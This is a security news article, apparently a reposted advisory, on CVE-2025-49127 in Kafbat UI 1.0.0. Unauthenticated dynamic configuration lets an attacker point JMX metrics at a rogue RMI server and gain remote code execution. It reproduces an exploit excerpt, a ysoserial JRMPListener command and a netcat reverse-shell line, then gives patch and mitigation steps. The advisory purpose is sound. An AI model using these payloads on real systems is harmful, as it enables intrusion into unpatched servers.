Version 1.0.0 blindly opens Java Management Extensions (JMX) connections supplied through its convenient “dynamic cluster configuration” feature.
By pointing the interface at an attacker-controlled JMX endpoint, a threat actor can trigger unsafe deserialization and run arbitrary commands on the server—no login required.
When administrators add a cluster, Kafbat UI builds a JMX URL from user data instead of a whitelist:
java// JmxMetricsRetriever.java
String jmxUrl = "service:jmx:rmi:///jndi/rmi://"
+ node.host() + ":" + c.getMetricsConfig().getPort()
+ "/jmxrmi"; // user-controlled host & port
connector.connect(env); // triggers RMI ↔ deserialization
Because authentication is disabled by default (auth.type: DISABLED), anyone can send a PUT request to /api/config that sets metrics.type: "JMX" and a rogue port.
During its 30-second metrics poll, the scheduler calls connector.connect(), starting a Java RMI handshake.
A malicious server then delivers a CommonsCollections7 gadget chain generated with ysoserial, pivoting into Runtime.exec().
Researchers released a two-phase exploit that first enables unsafe deserialization, then launches a reverse shell:
python# cve202549127_exploit.py (excerpt)
payload = {
"config": {
"properties": {
"kafka": {
"clusters": [{
"name": "rce",
"bootstrapServers": "kafka-malicious-broker:9093",
"metrics": {"type": "JMX", "port": 1719}
}]
}
}
}
}
requests.put("http://target:8080/api/config", json=payload, timeout=30)
Running
textjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7
"nc 192.0.2.10 9094 -e /bin/sh"
followed by a Netcat listener on 9094 reliably hands back a shell within seconds on a stock Docker deployment.
Maintainers have shipped Kafbat UI 1.1.0, which:
jdk.serialFilter) to block gadget payloads.Operators should:
docker pull ghcr.io/kafbat/kafka-ui:v1.1.0 and redeploy.environment: DYNAMIC_CONFIG_ENABLED: "false"service:jmx:rmi traffic; exploitation attempts leave tell-tale IllegalArgumentException: filter status: REJECTED logs once the patch is applied.The zero-click nature of CVE-2025-49127 means unpatched dashboards are already attractive targets for crypto-miners and lateral-movement toolkits.
With proof-of-concept code public, defenders have little time: patch, segment, and monitor now—before your Kafka monitoring box becomes an attacker’s beachhead.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
The post Kafbat UI Vulnerabilities Enable Arbitrary Code Execution via JMX Services appeared first on Cyber Security News.
BROWNWOOD, Texas (KTAB/KRBC) - Families in Brownwood spent part of their spring break getting an…
I ran an experiment this week that I did not expect to be instructive, and…
Today's links Corrupt anticorruption: Notes from a target-rich environment. Hey look at this: Delights to…
Robotics How Pokémon Go Is Giving Delivery Robots an Inch-Perfect View of the WorldWill Douglas…
Digital communication is well beyond picture and prose. Nowadays viewers demand more interactive and human-like…
AI video generators are revolutionizing the film industry in 2026 by drastically reducing VFX budgets,…
This website uses cookies.